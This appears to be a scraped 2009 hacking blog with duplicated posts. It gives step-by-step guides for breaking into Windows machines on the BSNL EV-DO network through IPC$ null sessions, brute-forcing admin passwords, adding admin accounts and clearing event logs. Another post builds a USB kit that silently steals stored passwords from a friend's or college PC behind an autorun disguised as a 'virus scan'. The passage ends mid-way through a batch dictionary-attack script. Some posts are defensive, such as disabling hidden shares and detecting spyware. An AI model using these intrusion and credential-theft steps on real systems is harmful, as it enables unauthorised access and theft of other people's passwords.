NetBIOS open way for many Intruders if the port is open in a LAN, by default the port number for the NetBOS would be 139, and if it is in open state, then the hackers can take advantage over the default hidden share present in windows box specifically the IPC$ share, ( IPC - Inter Process Connect ), here the attacker can exploit this just by using the 'net use' command that is shiped with the windows machine itself, they will juts use the 'net use ' command and will establish a remote connection via IPC$ and once done, they can remotely create user account on the compromised box and can establish a telnet connection and can easily root the box. Here is a counter measure that can be taken to avoid this sort of attack, By default Windows 2000, Windows XP and WinNT automatically enables the hidden shares (admin$, c$, d$ and IPC$ - Inter Process Connect ). The following Registry Key will help you in disabling the Hidden shares. System Key: [HKEY_LOCAL_MACHINE > System > CurrentControlSet > Services > LanmanServer > Parameters]
Value Name: AutoShareWks
Data Type: REG_DWORD (DWORD Value)
Value Data: (0 = disable shares, 1 = enable)
Goto Run and type compmgmt.msc, this will take you to the computer management, here Click on 'shared folders' and then 'share' then delete the shares that you want to remove. Note : To remove the admin share for only the current session use the second method (Computer Management console), if you want a permanent removal, add the AutoShareWks in the registry.
WELCOME GUEST ENJOY YOUR STAY HERE...
TELL A FRIEND ABOUT US..
Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts
Monday, September 14, 2009
Root the Machines that are using BSNL EV-DO
BSNL is a Government body now been privatised that offers Telecommunication and Broadband services in India. It also offers USB Modem for both rental and for owning. This hack works on almost all the USB Modems ( ZTE EV-DO ) provided by BSNL. EVDO is a Technology short for " Evolution - Data only " that uses 3G Technology introduced by Qualcomm. Here i am going to share how to eavesdrop into someones Network who are using BSNL EV-DO, and using this trick you can entirely take control of the box.
This hack works only with Windows based Boxes. Step 1 :
Install the Driver required for BSNL ZTE EV-DO Modem, as a part of the installation, it will prompt you to plug-in the device, then change the default username and password, then connect to the internet. Step 2 :
While the modem is connected to the internet, open up a command prompt and type " Net View "
command in it, then it will display all the names of the machines that are connected to the same network that uses the similar device ( EV-DO ). It will blindly display the hostnames that are a part in that network, but it wont show whether the connected machines are alive or not. Here is list of hostnames that was available when i was dealing with this, let it be a POC.
Step 3:
Now the major part is to find a host that is alive, and this can be done both manually and
also by using automated Batch program, once you got the host that is alive, you can connect to
its hidden IPC$ ( Inter Process Connect ) share by using the below command, Net use \\IP- Address\IPC$ "" in my case i used the following.....
So this will establish a NULL session with the target host that i have used, now the target system and my computer is connected, and by using we have to move further...
Step 4:
Now to check whether there is connection between your computer and the target, just type the below command, net use This will reveal the current connections..... Step 5: In every windows based boxes, there must be an Administrator account, few of them will never set a password for default administrator account, and only few will do it. Now we are trying to gain Administrator access to the remote box, and this can be done by using Dictionary attack or by Launching Brute Force attack against the target.
You can compromise admin account by using Dictionary attack, and you can use the "LAN Remote
user - Dictionary Attack" Check with the syntax properly before starting..... Step 6:
Once you obtained the password of the administrator account, you can use the same net command
to establish a connection with administrator rights.... Net use \\IP-Address\sharename "password" /user:administrator once you got the message "Command Completed Successfully" then you are connected to the target
machine with admin access. Step 7:
Now goto run and type "compmgmt.msc", this will take you to the Computer management, Click on
Action -> Connect to another computer.... and then type in the IP address or the Hostname of
the target machine. Once you got access to the remote host, now you can see the computer management(Local) changes
to the Computer Management(XXX.XXX.XXX.XXX) - Remote IP. Step 8:
You can now create a New user account on the remote machine by expanding the Local users and
Groups -> users -> right click there and create a new user and assign Admin rights. Step 9:
Now you can start a Terminal Session to the remote host, or you can just start a Remote desktop connection, goto run and type MSTSC and hit enter. Step 10:
Type in the Ip address of the remote host in the Remote Desktop connection wizard and take over the compter. Step 11:
To cover the traces just clear all the logs in the eventviewer in the target by using the computer management itself, also make sure to delete the IPC$ connection logs by using the command Net use \\IP- Address\IPC$ /delete This is a high Potential Security threat... because anyone can easily gain control over the computer accross the network and can root them, Make them Zombies and later as botnets and so on. Step 12:
To avoid being a victim to such kind of attacks, you can read the aticle by Clicking here . Disclaimer :-
This is only meant for Educational purpose, The author nor the publisher takes No Responsibilty for any illegal activity.
This hack works only with Windows based Boxes. Step 1 :
Install the Driver required for BSNL ZTE EV-DO Modem, as a part of the installation, it will prompt you to plug-in the device, then change the default username and password, then connect to the internet. Step 2 :
While the modem is connected to the internet, open up a command prompt and type " Net View "
command in it, then it will display all the names of the machines that are connected to the same network that uses the similar device ( EV-DO ). It will blindly display the hostnames that are a part in that network, but it wont show whether the connected machines are alive or not. Here is list of hostnames that was available when i was dealing with this, let it be a POC.
Step 3:
Now the major part is to find a host that is alive, and this can be done both manually and
also by using automated Batch program, once you got the host that is alive, you can connect to
its hidden IPC$ ( Inter Process Connect ) share by using the below command, Net use \\IP- Address\IPC$ "" in my case i used the following.....
So this will establish a NULL session with the target host that i have used, now the target system and my computer is connected, and by using we have to move further...
Step 4:
Now to check whether there is connection between your computer and the target, just type the below command, net use This will reveal the current connections..... Step 5: In every windows based boxes, there must be an Administrator account, few of them will never set a password for default administrator account, and only few will do it. Now we are trying to gain Administrator access to the remote box, and this can be done by using Dictionary attack or by Launching Brute Force attack against the target.
You can compromise admin account by using Dictionary attack, and you can use the "LAN Remote
user - Dictionary Attack" Check with the syntax properly before starting..... Step 6:
Once you obtained the password of the administrator account, you can use the same net command
to establish a connection with administrator rights.... Net use \\IP-Address\sharename "password" /user:administrator once you got the message "Command Completed Successfully" then you are connected to the target
machine with admin access. Step 7:
Now goto run and type "compmgmt.msc", this will take you to the Computer management, Click on
Action -> Connect to another computer.... and then type in the IP address or the Hostname of
the target machine. Once you got access to the remote host, now you can see the computer management(Local) changes
to the Computer Management(XXX.XXX.XXX.XXX) - Remote IP. Step 8:
You can now create a New user account on the remote machine by expanding the Local users and
Groups -> users -> right click there and create a new user and assign Admin rights. Step 9:
Now you can start a Terminal Session to the remote host, or you can just start a Remote desktop connection, goto run and type MSTSC and hit enter. Step 10:
Type in the Ip address of the remote host in the Remote Desktop connection wizard and take over the compter. Step 11:
To cover the traces just clear all the logs in the eventviewer in the target by using the computer management itself, also make sure to delete the IPC$ connection logs by using the command Net use \\IP- Address\IPC$ /delete This is a high Potential Security threat... because anyone can easily gain control over the computer accross the network and can root them, Make them Zombies and later as botnets and so on. Step 12:
To avoid being a victim to such kind of attacks, you can read the aticle by Clicking here . Disclaimer :-
This is only meant for Educational purpose, The author nor the publisher takes No Responsibilty for any illegal activity.
Saturday, September 12, 2009
Unlock Yahoo when Account is Blocked
This is a very easy but an awesome Trick. When you or someone else enters an incorrect login multiple times then Yahoo! locks the account for "security reasons" and you are unable to access your chat names. Cool thing is that, these are a piece of cake to unlock. All you need is a list of Yahoo servers to log in with. Every time you login, you are using what's called a server to access yahoo. You login with a cookie, which is sort of like an information packet or ID proving that you are who you claim to be, and the account is yours. When people attempt to log your name in multiple times with a locking tool, all they are doing is logging in over and over with an incorrect password until your cookie expires, which means you will no longer be allowed to login. So, when you find yourself locked, what you need to do is refresh your cookie. But how can you do that when the yahoo server you were using has blocked you? Simple, find another server. Yahoo has servers all over the place. There are more than I'd care to count. I'll include a pretty decent sized list with this tutorials. All you have to do is paste one of these servers in your browser and log in on the page you see. Unless you have been locked on that server as well, you will receive a fresh cookie and will be able to log in to messenger again. Tons of people try to go through their email and login there to unlock an account, but a smart locker will shut down your mail server first, then cut off your chat server. Most people don't know what to do if the email is blocked, so they give up trying. That's why I don't even bother with the email method. I simply pick another server, log in, and I'm good to go. There are so many servers out there that it is impossible to lock them all. Even if they could, the lock is only for about 12 hours, and then you're back in business. Some Yahoo Servers : http://cn.mail.yahoo.com/?id= 77070 CHINA
http://edit.india.yahoo.com/conf ig/mail?.intl=in INDIA
http://edit.europe.yahoo.com/ config/mail?.intl=uk EUROPE/UK
http://login.yahoo.com/config/m ail?.intl=cf FRENCH CANADIAN
http://my.yahoo.co.jp/ JAPAN
http://login.yahoo.com/config/l ogin USA Yahoo Chat Logins : http://hk.chat.yahoo.com/?my Home HK
http://tw.chat.yahoo.com/?my Home Taiwan
http://in.chat.yahoo.com/?myH ome India
http://chat.yahoo.co.jp/?myHome Japan
http://chat.yahoo.co.jp/?myHome Korea
http://sg.chat.yahoo.com/?my Home Singapore
http://chinese.chat.yahoo.co m/?myHome Chinese
http://cn.chat.yahoo.com/?my Home China
http://asia.chat.yahoo.com/? myHome Asia
http://au.chat.yahoo.com/?my Home Australia & Nz
http://dk.chat.yahoo.com/ Denmark
http://fr.docs.yahoo.com/chat/ chatbylycos.html France
http://de.docs.yahoo.com/chat /chatbylycos.html Germany
http://it.docs.yahoo.com/chat/ chat.html Italy
http://no.chat.yahoo.com/ Norway
http://es.docs.yahoo.com/chat/ chatbylycos.html Spain
http://se.chat.yahoo.com/ Sweden
http://uk.docs.yahoo.com/chat /chatbylycos.html Uk & Ireland
http://ar.chat.yahoo.com/?my Home Argentina
http://br.chat.yahoo.com/?my Home Brazil
http://espanol.chat.yahoo.co m/?myHome South America
http://mx.chat.yahoo.com/?m yHome Mexico
http://ca.chat.yahoo.com/?my Home Canada
http://world.yahoo.com/ World of yahoo Cheers and Keep learning..
http://edit.india.yahoo.com/conf ig/mail?.intl=in INDIA
http://edit.europe.yahoo.com/ config/mail?.intl=uk EUROPE/UK
http://login.yahoo.com/config/m ail?.intl=cf FRENCH CANADIAN
http://my.yahoo.co.jp/ JAPAN
http://login.yahoo.com/config/l ogin USA Yahoo Chat Logins : http://hk.chat.yahoo.com/?my Home HK
http://tw.chat.yahoo.com/?my Home Taiwan
http://in.chat.yahoo.com/?myH ome India
http://chat.yahoo.co.jp/?myHome Japan
http://chat.yahoo.co.jp/?myHome Korea
http://sg.chat.yahoo.com/?my Home Singapore
http://chinese.chat.yahoo.co m/?myHome Chinese
http://cn.chat.yahoo.com/?my Home China
http://asia.chat.yahoo.com/? myHome Asia
http://au.chat.yahoo.com/?my Home Australia & Nz
http://dk.chat.yahoo.com/ Denmark
http://fr.docs.yahoo.com/chat/ chatbylycos.html France
http://de.docs.yahoo.com/chat /chatbylycos.html Germany
http://it.docs.yahoo.com/chat/ chat.html Italy
http://no.chat.yahoo.com/ Norway
http://es.docs.yahoo.com/chat/ chatbylycos.html Spain
http://se.chat.yahoo.com/ Sweden
http://uk.docs.yahoo.com/chat /chatbylycos.html Uk & Ireland
http://ar.chat.yahoo.com/?my Home Argentina
http://br.chat.yahoo.com/?my Home Brazil
http://espanol.chat.yahoo.co m/?myHome South America
http://mx.chat.yahoo.com/?m yHome Mexico
http://ca.chat.yahoo.com/?my Home Canada
http://world.yahoo.com/ World of yahoo Cheers and Keep learning..
Wednesday, September 9, 2009
How to detect computer & email monitoring or spying software
Computer Monitoring
So now, if you still think someone is spying on you, here's what you can do! The good thing right now is that neither Windows XP SP3 nor Windows Vista support multiple concurrent connections while someone is logged into the console (there is a hack for this, but I would not worry about). What this means is that if you're logged into your XP or Vista computer (like you are now if you're reading this), and someone were to connect to it using the BUILT-IN REMOTE DESKTOP feature of Windows, your screen would become locked and it would tell tell you who is connected. So why is that useful? It's useful because it means that in order for someone to connect to YOUR session without you noticing or your screen being taken over, they have use third-party software and it's a lot easier to detect third-party software than a normal process in Windows. So now we're looking for third-party software, which is usually referred to as remote control software or virtual network computing (VNC) software. First, the easy thing to do is to simply check in your Start Menu All Programs and check whether or not something like VNC, RealVNC, TightVNC, UltraVNC, LogMeIn, GoToMyPC, etc is installed. A lot of times IT people are sloppy and figure that a normal user won't know what a piece of software is and will simply ignore it. If any of those programs are installed, then someone can connect to your computer without you knowing it as long as the program is running in the background as a Windows service. That brings us to the second point. Usually, if one of the above listed programs are installed, there will be an icon for it in the task bar because it needs to be constantly running to work.
Check all of your icons (even the hidden ones) and see what is running. If you find something you've not heard of, do a quick Google search to see what pops up. It's usually quite hard to remove something from the taskbar, so if there is something installed to monitor your computer, it should be there. However, if someone really sneaky installed it and nothing shows up there, you can try another way. Again, because these are third-party apps, they have to connect to Windows XP or Vista on different communication ports. Ports are simply a virtual data connection by which computers share information directly. As you may already know, XP and Vista come with a built-in Firewall that blocks many of the incoming ports for security reasons. If you're not running an FTP site, why should your port 23 be open, right? So in order for these third-party apps to connect to your computer, they must come through a port, which has to be open on your computer. You can check all the open ports by going to Start , Control Panel , and Windows Firewall .
Click on the Exceptions tab and you'll see see a list of programs with check boxes next to them. The ones that are checked are "open" and the unchecked or unlisted ones are "closed". Go through the list and see if there is a program you're not familiar with or that matches VNC, remote control, etc. If so, you can block the program by un-checking the box for it!
The only other way I can think of to see if someone is connected to your computer is to see if there are any processes running under a different name! If you go to the Windows Task Manager (press Cntr + Shift + Esc together) and go to the Processes tab, you'll see a column titled User Name .
Scroll through all the processes and you should only see your user name, Local Service, Network Service, and System. Anything else means someone is logged into the computer!
Email & Web Site Monitoring
To check whether your email is being monitored is quite simple. Always, when you send an email from Outlook or some email client on your computer, it has to connect to the email server. Now it can either connect directly or it can connect through what is called a proxy server, which takes a request, alters or checks it, and forwards it on to another server. If you're going through a proxy server for email or web browsing, than the web sites you access or the emails you write can be saved and viewed later on. You can check for both and here's how. For IE, go to Tools , then Internet Options . Click on the Connections tab and choose LAN Settings .
If the Proxy Server box is checked and it has a local IP address with a port number, then that means you're going through a local server first before it reaches the web server. This means that any web site you visit first goes through another server running some kind of software that either blocks the address or simply logs it. For your email, you're checking for the same thing, a local IP address for the POP and SMTP mail servers. To check in Outlook, go to Tools , Email Accounts , and click Change or Properties, and find the values for POP and SMTP server.
If you're working in a big corporate environment, it's more than likely that the Internet and email are being monitored. You should always be careful in writing emails or browsing web sites while at the office. Trying to break through the security also might get you in trouble if they find out you bypassed their systems!
So now, if you still think someone is spying on you, here's what you can do! The good thing right now is that neither Windows XP SP3 nor Windows Vista support multiple concurrent connections while someone is logged into the console (there is a hack for this, but I would not worry about). What this means is that if you're logged into your XP or Vista computer (like you are now if you're reading this), and someone were to connect to it using the BUILT-IN REMOTE DESKTOP feature of Windows, your screen would become locked and it would tell tell you who is connected. So why is that useful? It's useful because it means that in order for someone to connect to YOUR session without you noticing or your screen being taken over, they have use third-party software and it's a lot easier to detect third-party software than a normal process in Windows. So now we're looking for third-party software, which is usually referred to as remote control software or virtual network computing (VNC) software. First, the easy thing to do is to simply check in your Start Menu All Programs and check whether or not something like VNC, RealVNC, TightVNC, UltraVNC, LogMeIn, GoToMyPC, etc is installed. A lot of times IT people are sloppy and figure that a normal user won't know what a piece of software is and will simply ignore it. If any of those programs are installed, then someone can connect to your computer without you knowing it as long as the program is running in the background as a Windows service. That brings us to the second point. Usually, if one of the above listed programs are installed, there will be an icon for it in the task bar because it needs to be constantly running to work.
Check all of your icons (even the hidden ones) and see what is running. If you find something you've not heard of, do a quick Google search to see what pops up. It's usually quite hard to remove something from the taskbar, so if there is something installed to monitor your computer, it should be there. However, if someone really sneaky installed it and nothing shows up there, you can try another way. Again, because these are third-party apps, they have to connect to Windows XP or Vista on different communication ports. Ports are simply a virtual data connection by which computers share information directly. As you may already know, XP and Vista come with a built-in Firewall that blocks many of the incoming ports for security reasons. If you're not running an FTP site, why should your port 23 be open, right? So in order for these third-party apps to connect to your computer, they must come through a port, which has to be open on your computer. You can check all the open ports by going to Start , Control Panel , and Windows Firewall .
Click on the Exceptions tab and you'll see see a list of programs with check boxes next to them. The ones that are checked are "open" and the unchecked or unlisted ones are "closed". Go through the list and see if there is a program you're not familiar with or that matches VNC, remote control, etc. If so, you can block the program by un-checking the box for it!
The only other way I can think of to see if someone is connected to your computer is to see if there are any processes running under a different name! If you go to the Windows Task Manager (press Cntr + Shift + Esc together) and go to the Processes tab, you'll see a column titled User Name .
Scroll through all the processes and you should only see your user name, Local Service, Network Service, and System. Anything else means someone is logged into the computer!
Email & Web Site Monitoring
To check whether your email is being monitored is quite simple. Always, when you send an email from Outlook or some email client on your computer, it has to connect to the email server. Now it can either connect directly or it can connect through what is called a proxy server, which takes a request, alters or checks it, and forwards it on to another server. If you're going through a proxy server for email or web browsing, than the web sites you access or the emails you write can be saved and viewed later on. You can check for both and here's how. For IE, go to Tools , then Internet Options . Click on the Connections tab and choose LAN Settings .
If the Proxy Server box is checked and it has a local IP address with a port number, then that means you're going through a local server first before it reaches the web server. This means that any web site you visit first goes through another server running some kind of software that either blocks the address or simply logs it. For your email, you're checking for the same thing, a local IP address for the POP and SMTP mail servers. To check in Outlook, go to Tools , Email Accounts , and click Change or Properties, and find the values for POP and SMTP server.
If you're working in a big corporate environment, it's more than likely that the Internet and email are being monitored. You should always be careful in writing emails or browsing web sites while at the office. Trying to break through the security also might get you in trouble if they find out you bypassed their systems!
Tuesday, September 1, 2009
Protech OS Installation
How to Install Protech OS ? [For Absolute Beginners]
I am writing this tutorial for people who are new to Linux Distro's and Installation. Considered you have Windows XP Installed already in your computer. And this Installation method best suitable for Dual Booting option(Both Windows & Linux). Also including Screenshots for better clarity in understanding. Partitioning It would be great if you have Hiren Boot Disk for partitioning and formatting a part of the disk (may be complete) to allot it for Protech Installation. Boot the Hiren Disk and Resize or Create the partition in which you like to perform the installation. The format must be EXT2 or EXT3. I normally prefer Norton Partion Magic which is available as the first option in that Hiren Boot Menu -> Partition Tools . Hiren actually consist of many useful disk, recovery and security related tools. Take a look at the sample screenshot below.
Once done with this step, you will see a GUI Partition window where you can simply complete the Partition Job with the help of mouse if the driver available by default in the Hiren CD. * Remember you must have define the partition space for protech as atleast 5GB. Load the Protech CD
Reboot the computer after partitioning and formatting done. Now place the Protech OS CD into the CD Drive and Boot the computer using Protech. Follow the below steps to begin the Installation Process. 1 . Select Install or Upgrade option available as first in the Boot Menu Screen. 2. If you like to do any Memory or CD/DVD Error check you may do so by selecting the 3 rd and 4 th options. 3. Wait till it loads into desktop. As by default it boots as Live OS we must wait till the Desktop Loads Successfully. Also remember Protech is based on Ubuntu. Hence it is possible to use the Software Repository of Ubuntu as well as Debian by default. 4. Once loaded into the Desktop you can navigate the controls and options by simply doing Right Click in the Mouse.
5 . Application TAB Consist of Editors, Multimedia, Net, Programming and System Utilties. 6 . Next comes the Security Tools option, the one differentiate Protech OS from other Security Distributions. It actually contains a good recognized Security Software that one should play with. 7. You may change the default them to your wish in the Fluxbox Menu. 8 . Let's move on to "HOME" to begin the Installation Process. In the New Window you will see the only icon named as Install when you are in Live CD. 9. In the Pop up window you can select the default setups need to be configured. This is similar to Windows or Ubuntu Installation Steps. 10 . It is very important that you must select the Partition Space alloted previously using Hiren Boot Disk. 11 . Alright ! Configure your Root login and password, then partition selection and finally begin the installation process. 12. Once its started you may need to wait for 20 mins to 30 mins ( Depending on the Processor Speed ) to transfer the Compressed files from CD to the Hard Drive. 13 . Yummy ! Installation completed and it will prompt you for Rebooting ( Remove the CD from the CD / DVD Drive ). 14. It's all done now. You are ready to use the Protech OS with various security Tools. It also works as a Best Desktop OS for me.
I am writing this tutorial for people who are new to Linux Distro's and Installation. Considered you have Windows XP Installed already in your computer. And this Installation method best suitable for Dual Booting option(Both Windows & Linux). Also including Screenshots for better clarity in understanding. Partitioning It would be great if you have Hiren Boot Disk for partitioning and formatting a part of the disk (may be complete) to allot it for Protech Installation. Boot the Hiren Disk and Resize or Create the partition in which you like to perform the installation. The format must be EXT2 or EXT3. I normally prefer Norton Partion Magic which is available as the first option in that Hiren Boot Menu -> Partition Tools . Hiren actually consist of many useful disk, recovery and security related tools. Take a look at the sample screenshot below.
Once done with this step, you will see a GUI Partition window where you can simply complete the Partition Job with the help of mouse if the driver available by default in the Hiren CD. * Remember you must have define the partition space for protech as atleast 5GB. Load the Protech CD
Reboot the computer after partitioning and formatting done. Now place the Protech OS CD into the CD Drive and Boot the computer using Protech. Follow the below steps to begin the Installation Process. 1 . Select Install or Upgrade option available as first in the Boot Menu Screen. 2. If you like to do any Memory or CD/DVD Error check you may do so by selecting the 3 rd and 4 th options. 3. Wait till it loads into desktop. As by default it boots as Live OS we must wait till the Desktop Loads Successfully. Also remember Protech is based on Ubuntu. Hence it is possible to use the Software Repository of Ubuntu as well as Debian by default. 4. Once loaded into the Desktop you can navigate the controls and options by simply doing Right Click in the Mouse.
5 . Application TAB Consist of Editors, Multimedia, Net, Programming and System Utilties. 6 . Next comes the Security Tools option, the one differentiate Protech OS from other Security Distributions. It actually contains a good recognized Security Software that one should play with. 7. You may change the default them to your wish in the Fluxbox Menu. 8 . Let's move on to "HOME" to begin the Installation Process. In the New Window you will see the only icon named as Install when you are in Live CD. 9. In the Pop up window you can select the default setups need to be configured. This is similar to Windows or Ubuntu Installation Steps. 10 . It is very important that you must select the Partition Space alloted previously using Hiren Boot Disk. 11 . Alright ! Configure your Root login and password, then partition selection and finally begin the installation process. 12. Once its started you may need to wait for 20 mins to 30 mins ( Depending on the Processor Speed ) to transfer the Compressed files from CD to the Hard Drive. 13 . Yummy ! Installation completed and it will prompt you for Rebooting ( Remove the CD from the CD / DVD Drive ). 14. It's all done now. You are ready to use the Protech OS with various security Tools. It also works as a Best Desktop OS for me.
Thursday, August 27, 2009
Hack Passwords Using USB Drive
Today I will show you how to hack Passwords using an USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend's/college Computer. We need the following tools to create our rootkit. MessenPass : Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4 .x/2003 , AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM. il PassView : Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002 /2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts. IE Passview : IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0 , as well as older versions of Internet explorer, v4.0 - v6.0 Protected Storage PassView : Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more... PasswordFox : PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. Here is a step by step procedre to create the password hacking toolkit. NOTE: You must temporarily disable your antivirus before following these steps. 1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive. ie: Copy the files - mspass.exe , mailpv.exe , iepv.exe , pspv.exe and passwordfox.exe into your USB Drive. 2. Create a new Notepad and write the following text into it [autorun]
open=launch.bat
ACTION= Perform a Virus Scan save the Notepad and rename it from New Text Document.txt to autorun.inf Now copy the autorun.inf file onto your USB pendrive. 3. Create another Notepad and write the following text onto it. start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt save the Notepad and rename it from New Text Document.txt to launch.bat Copy the launch.bat file also to your USB drive. Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend's PC or on your college computer. Just follow these steps 1 . Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive). 2. In the pop-up window, select the first option ( Perform a Virus Scan ). 3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files. 4. Remove the pendrive and you'll see the stored passwords in the .TXT files. This hack works on Windows 2000, XP,Vista and 7
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts. IE Passview : IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0 , as well as older versions of Internet explorer, v4.0 - v6.0 Protected Storage PassView : Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more... PasswordFox : PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. Here is a step by step procedre to create the password hacking toolkit. NOTE: You must temporarily disable your antivirus before following these steps. 1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive. ie: Copy the files - mspass.exe , mailpv.exe , iepv.exe , pspv.exe and passwordfox.exe into your USB Drive. 2. Create a new Notepad and write the following text into it [autorun]
open=launch.bat
ACTION= Perform a Virus Scan save the Notepad and rename it from New Text Document.txt to autorun.inf Now copy the autorun.inf file onto your USB pendrive. 3. Create another Notepad and write the following text onto it. start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt save the Notepad and rename it from New Text Document.txt to launch.bat Copy the launch.bat file also to your USB drive. Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend's PC or on your college computer. Just follow these steps 1 . Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive). 2. In the pop-up window, select the first option ( Perform a Virus Scan ). 3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files. 4. Remove the pendrive and you'll see the stored passwords in the .TXT files. This hack works on Windows 2000, XP,Vista and 7
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.
Coding errors that helped Hackers and Intruders
There has been some 25 software coding errors that helped the Cyber criminals helped them to have access the site and accounts to nearly 1.5 million security breaches.
The SANS Institute in Maryland said that in 2008 , just two of the errors led to more than 1.5 m web site security breaches. The organisations, which helped making the list, include the US National Security Agency, the Department of Homeland Security, Microsoft, and Symantec published the document."The top 25 list gives developers a minimum set of coding errors that must be eradicated before software is used by customers," the BBC quoted Chris Wysopal, chief technology officer with Veracode.
SANS director, Mason Brown said: "There appears to be broad agreement on the programming errors. Now it is time to fix them. We need to make sure every programmer knows how to write code that is free of the top 25 errors."While, most of the earlier advice focused on vulnerabilities that could have originated from programming errors, the 25 list examines the actual programming errors themselves.The 25 Most Dangerous Programming Errors are:
CWE-116 :Improper Encoding or Escaping of OutputCWE-89 :Failure to Preserve SQL Query StructureCWE-20 :Improper Input ValidationCWE-79 :Failure to Preserve Web Page StructureCWE-78 :Failure to Preserve OS Command StructureCWE-319 :Cleartext Transmission of Sensitive InformationCWE-352:Cross-Site Request ForgeryCWE-362 :Race ConditionCWE-209 :Error Message Information LeakCWE-119 :Failure to Constrain Operations within the Bounds of a Memory BufferCWE-642 :External Control of Critical State DataCWE- 73:External Control of File Name or Path
CWE-665 :Improper InitializationCWE-426 :Untrusted Search PathCWE-94 :Failure to Control Generation of CodeCWE- 494 :Download of Code Without Integrity CheckCWE-404 :Improper Resource Shutdown or ReleaseCWE-682 :Incorrect CalculationCWE-285 :Improper Access ControlCWE-327:Use of a Broken or Risky Cryptographic AlgorithmCWE-259 :Hard-Coded PasswordCWE-732 :Insecure Permission Assignment for Critical ResourceCWE-330 :Use of Insufficiently Random ValuesCWE- 250 :Execution with Unnecessary PrivilegesCWE-602:Client-Side Enforcement of Server-Side Security (ANI)This List is produced by National Security Agency (NSA) and 30 other organisations to put forward the flaws.
The SANS Institute in Maryland said that in 2008 , just two of the errors led to more than 1.5 m web site security breaches. The organisations, which helped making the list, include the US National Security Agency, the Department of Homeland Security, Microsoft, and Symantec published the document."The top 25 list gives developers a minimum set of coding errors that must be eradicated before software is used by customers," the BBC quoted Chris Wysopal, chief technology officer with Veracode.
SANS director, Mason Brown said: "There appears to be broad agreement on the programming errors. Now it is time to fix them. We need to make sure every programmer knows how to write code that is free of the top 25 errors."While, most of the earlier advice focused on vulnerabilities that could have originated from programming errors, the 25 list examines the actual programming errors themselves.The 25 Most Dangerous Programming Errors are:
CWE-116 :Improper Encoding or Escaping of OutputCWE-89 :Failure to Preserve SQL Query StructureCWE-20 :Improper Input ValidationCWE-79 :Failure to Preserve Web Page StructureCWE-78 :Failure to Preserve OS Command StructureCWE-319 :Cleartext Transmission of Sensitive InformationCWE-352:Cross-Site Request ForgeryCWE-362 :Race ConditionCWE-209 :Error Message Information LeakCWE-119 :Failure to Constrain Operations within the Bounds of a Memory BufferCWE-642 :External Control of Critical State DataCWE- 73:External Control of File Name or Path
CWE-665 :Improper InitializationCWE-426 :Untrusted Search PathCWE-94 :Failure to Control Generation of CodeCWE- 494 :Download of Code Without Integrity CheckCWE-404 :Improper Resource Shutdown or ReleaseCWE-682 :Incorrect CalculationCWE-285 :Improper Access ControlCWE-327:Use of a Broken or Risky Cryptographic AlgorithmCWE-259 :Hard-Coded PasswordCWE-732 :Insecure Permission Assignment for Critical ResourceCWE-330 :Use of Insufficiently Random ValuesCWE- 250 :Execution with Unnecessary PrivilegesCWE-602:Client-Side Enforcement of Server-Side Security (ANI)This List is produced by National Security Agency (NSA) and 30 other organisations to put forward the flaws.
Friday, August 21, 2009
LAN Remote user - Dictionary Attack (hack any system in lan)
Create and use this Batch file to launch a Dictionary attack and find the Windows logon Credentials in a LAN.
You need a Dictionary text file to proceed further to launch this attack successfully. Just Follow the steps below, 1. Open up a Notepad file.
2. Copy and paste the below code and save it as a Batch file with.bat extension.@echo off
if "%1''=="" goto fin
if "%2''=="" goto fin
del logfile.txt
FOR /F "tokens=1'' %%i in (passlist.txt) do ^
echo %%i && ^
net use \\%1 \ipc$ %%i /u:%1 \%2 2>>logfile.txt && ^
echo %time% %date% >> output.txt && ^
